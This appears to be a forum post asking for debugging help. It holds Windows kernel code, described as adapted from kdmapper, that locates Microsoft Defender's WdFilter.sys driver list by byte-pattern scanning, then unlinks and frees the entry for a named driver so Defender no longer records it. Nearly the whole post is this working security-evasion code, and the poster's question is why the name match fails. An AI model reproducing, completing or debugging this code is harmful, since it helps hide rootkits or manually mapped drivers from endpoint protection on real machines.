auto RuntimeDriversList = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize,
"48 8B 0D ? ? ? ? FF 05");
if (!RuntimeDriversList) return false;
auto RuntimeDriversCountRef = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize,
"FF 05 ? ? ? ? 48 39 11");
if (!RuntimeDriversCountRef) return false;
auto MpFreeDriverInfoExRef = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize,
"49 8B C9 ? 89 ? 08 E8 ? ? ? ? ? ? ? ? ? ? ? E9");
if (!MpFreeDriverInfoExRef) {
MpFreeDriverInfoExRef = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize,
"48 89 4A ? 49 8B ? E8 ? ? ? ? ? ? ? ? ? ? ? E9");
if (!MpFreeDriverInfoExRef) return false;
}
MpFreeDriverInfoExRef += 0x7; // skip until call instruction
RuntimeDriversList = (ULONG64)ResolveRelativeAddress((LPBYTE)RuntimeDriversList, 3);
ULONG64 RuntimeDriversList_Head = RuntimeDriversList - 0x8;
ULONG64 RuntimeDriversCount = (ULONG64)ResolveRelativeAddress((LPBYTE)RuntimeDriversCountRef, 2);
ULONG64 RuntimeDriversArray = RuntimeDriversCount + 0x8;
RuntimeDriversArray = *(ULONG64*)RuntimeDriversArray;
ULONG64 MpFreeDriverInfoEx = (ULONG64)ResolveRelativeAddress((LPBYTE)MpFreeDriverInfoExRef, 1);
for (PLIST_ENTRY Entry = *(PLIST_ENTRY*)(RuntimeDriversList_Head);
Entry != (LIST_ENTRY*)RuntimeDriversList_Head;
Entry = Entry->Flink)
{
//PUNICODE_STRING Unicode_String = (PUNICODE_STRING)((ULONG64)Entry + 0x10);
UNICODE_STRING Unicode_String = *(UNICODE_STRING*)(Entry + 0x10);
if (MmIsAddressValid(Unicode_String.Buffer)) {
LogInfo(0, "Found Driver: %ws", Unicode_String.Buffer);
if (wcsstr(name, Unicode_String.Buffer)) {
//remove from RuntimeDriversArray
bool removedRuntimeDriversArray = false;
PVOID SameIndexList = (PVOID)((ULONG64)Entry - 0x10);
for (int k = 0; k < 256; k++) { // max RuntimeDriversArray elements
PVOID value = *(PVOID*)(RuntimeDriversArray + (k * 8));
if (value == SameIndexList) {
PVOID emptyval = (PVOID)(RuntimeDriversCount + 1); // this is not count+1 is position of cout addr+1
*(PVOID*)(RuntimeDriversArray + (k * 8)) = emptyval;
removedRuntimeDriversArray = true;
break;
}
}
if (!removedRuntimeDriversArray) return false;
auto NextEntry = Entry->Flink;
auto PrevEntry = Entry->Blink;
NextEntry->Blink = PrevEntry;
PrevEntry->Flink = NextEntry;
// decrement RuntimeDriversCount
*(ULONG*)RuntimeDriversCount = *(ULONG*)RuntimeDriversCount - 1;
// call MpFreeDriverInfoEx
ULONG64 DriverInfo = (ULONG64)Entry - 0x20;
//verify DriverInfo Magic
USHORT Magic = *(USHORT*)DriverInfo;
if (Magic != 0xDA18) {
//Log("[!] DriverInfo Magic is invalid, new wdfilter version?, driver info will not be released to prevent bsod" << std::endl);
}
else {
using MpFreeDriverInfoExFn = void(__fastcall*)(ULONG64);
MpFreeDriverInfoExFn MpFreeDriverInfoEx_ = (MpFreeDriverInfoExFn)MpFreeDriverInfoEx;
MpFreeDriverInfoEx_(DriverInfo);
}
//LogInfo(0, "WdFilterDriverList Cleaned: %s\n", Unicode_String.Buffer);
return true;
}
}
}
return false;
This code was pretty much taken from kdmapper and converted to kernel code, but there are some problems, Unable to match the loaded driver name in runtimeDrivers
`
bool clear_wd_filter_driver_list(const wchar_t* name)
{
DbgBreakPoint();
ULONG WdFilterSize = 0;
auto WdFilter = (ULONG64)GetSystemModuleBase(L"WdFilter.sys", &WdFilterSize);
if (WdFilter == 0) return false;
}
`
This code was pretty much taken from kdmapper and converted to kernel code, but there are some problems, Unable to match the loaded driver name in runtimeDrivers